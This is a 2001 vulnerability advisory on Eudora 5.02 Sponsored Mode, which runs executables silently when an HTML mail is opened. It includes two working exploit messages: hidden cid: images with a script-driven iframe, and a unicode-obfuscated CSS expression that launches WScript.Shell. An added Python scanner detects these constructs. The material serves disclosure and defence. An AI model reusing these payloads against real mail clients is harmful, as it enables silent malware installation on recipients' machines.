27 March 2001

Eudora Silent Delivery and Installation of Executables
------------------------------------------------------------------------

SUMMARY

A vulnerability in the Eudora mail client enables attackers to send a specially crafted e-mail that will silently install and run an executable on the recipient's machine. No user input is required other than opening the e-mail in Eudora 5.02 - Sponsored Mode, provided 'use Microsoft viewer' and 'allow executables in HTML content' are enabled.

DETAILS

Vulnerable systems:
Eudora 5.02 - Sponsored Mode

Immune systems:
Eudora 5.1

Example:
This can be exploited with relative ease as follows:

1. Create the following HTML mail message:

<img SRC="cid:mr.malware.to.you" style="display:none">
<img id=W0W src="cid:malware.com" style="display:none">
<center><h6>YOU!DORA</h6></center>
<IFRAME id=malware width=10 height=10 style="display:none" ></IFRAME>
<script>
// 18.03.01 http://www.malware.com
malware.location.href=W0W.src
</script>

Where our first image is our executable. Our second image comprises simple JavaScript and an ActiveX control.

Once the mail message is opened in Eudora 5.02 - Sponsored Mode, the two 'embedded' images are silently and instantly transferred to the 'Embedded' folder. Our very simple JavaScript location.href then automatically calls our second image comprising the simple JavaScript and ActiveX control (note: knowing the file names and locations is not necessary at all!), which is then displayed out of sight in our iframe. This in turn executes our *.exe.

Because our *.exe and our simple JavaScript and ActiveX control reside in the same folder (the so-called 'Embedded' folder), and because the second image is automatically called into our iframe, everything is instant.

2. A working example incorporating a harmless *.exe file is available at:
http://www.malware.com/you!DORA.txt

3. The following attack will work even if 'Allow executables in HTML content' is disabled.
This is specifically constructed to fire the ActiveX warning so that it is visually illustrated (harmless WSH to fire telnet if you click OK). Note that the warning message is by design and only for illustrative purposes.

<img SRC="cid:malware.com" height=2 width=2 STYLE="left:expression(document.write('\u0020 \u0020\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u0076\u0061\u0072 \u0020\u0077\u0073\u0068\u003d\u006e\u0065\u0077\u0020\u0041\u0063\u0074\u0069\u0076\u0065\u0058\u004f\u0062\u006a\u0065 \u0063\u0074\u0028\u0027\u0057\u0053\u0063\u0072\u0069\u0070\u0074\u002e\u0053\u0068\u0065\u006c\u006c\u0027\u0029 \u003b\u0020\u0020\u0077\u0073\u0068\u002e\u0052\u0075\u006e\u0028\u0027\u0074\u0065\u006c\u006e\u0065\u0074\u002e \u0065\u0078\u0065\u0027\u0029\u003b\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0020\u003c\u0021\u002d \u002d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u006d\u0061\u006c\u0077\u0061\u0072\u0065\u002e\u0063\u006f\u006d\u0020\u0032\u0032\u002e\u0030\u0032\u002e\u0030\u0031\u0020 \u002d\u002d\u003e'))">

This attack was tested on Win98, IE5.5, "Eudora 5.0.2 - Sponsored Mode", with "Microsoft Viewer" enabled, and "Allow executables in HTML content" disabled.

Solution:
This inline scripting hole has been fixed in Eudora 5.1. A beta of 5.1 can be found at http://www.eudora.com/betas/. The final release of 5.1 will be out very soon.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
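
Added example (not part of the original advisory): both messages above depend on active content in the HTML body, namely a script element, a hidden iframe, or a CSS expression() in a style attribute, alongside cid: parts hidden with display:none. The Python code below flags those constructs in a mail body before it is rendered. The function name, finding labels and the three sample bodies are constructed for illustration and carry no payload.

```python
import re
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "iframe", "object", "embed", "applet"}
CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)


class ActiveContentScanner(HTMLParser):
    """Records active-content findings as (label, tag) tuples."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        attrs = {k: (v or "") for k, v in attrs}
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-element", tag))
        # Strip CSS comments and whitespace so "exp/**/ression (" still matches.
        css = re.sub(r"\s+", "", CSS_COMMENT.sub("", attrs.get("style", ""))).lower()
        if "expression(" in css:
            self.findings.append(("css-expression", tag))
        # An inline MIME part (cid:) that is deliberately hidden from the reader.
        if "display:none" in css and attrs.get("src", "").strip().lower().startswith("cid:"):
            self.findings.append(("hidden-cid-part", tag))


def scan_html_body(html):
    """Return the list of findings for one HTML mail body."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples: same structure as the advisory's messages, no payload.
SAMPLE_HIDDEN_PARTS = (
    '<img src="cid:a@example.invalid" style="display:none">'
    '<img id=x src="cid:b@example.invalid" style="display: none">'
    '<iframe id=f width=10 height=10 style="display:none"></iframe>'
    "<script>/* inert placeholder */</script>"
)
SAMPLE_CSS_EXPRESSION = (
    '<img src="cid:c@example.invalid" height=2 width=2 style="left: exp/**/ression (0)">'
)
SAMPLE_BENIGN = '<p>Hello</p><img src="cid:logo@example.invalid" width=100>'

if __name__ == "__main__":
    for body in (SAMPLE_HIDDEN_PARTS, SAMPLE_CSS_EXPRESSION, SAMPLE_BENIGN):
        print(scan_html_body(body) or "clean")
```

Any non-empty result is a reason to quarantine the message or strip the HTML part; a visible inline image referenced by cid: alone produces no finding.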